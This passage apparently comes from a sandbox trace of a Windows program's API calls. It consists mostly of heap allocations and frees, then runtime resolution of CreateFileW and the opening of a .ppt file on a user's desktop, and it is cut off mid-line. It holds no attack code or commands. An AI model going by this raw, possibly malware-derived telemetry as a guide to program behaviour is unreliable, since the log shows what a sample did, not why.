RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0120.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.885] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.885] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0120.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0120.886] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0120.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.886] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.886] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.887] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.887] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.888] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.888] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.889] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0120.889] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.889] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.890] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.890] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.891] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.891] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.891] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0120.892] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.892] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.892] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.892] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0120.893] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aZ 2dgF6.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\az 2dgf6.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.893] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.894] FreeLibrary (hLibModule=0x772d0000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0120.894] HeapFree (in: 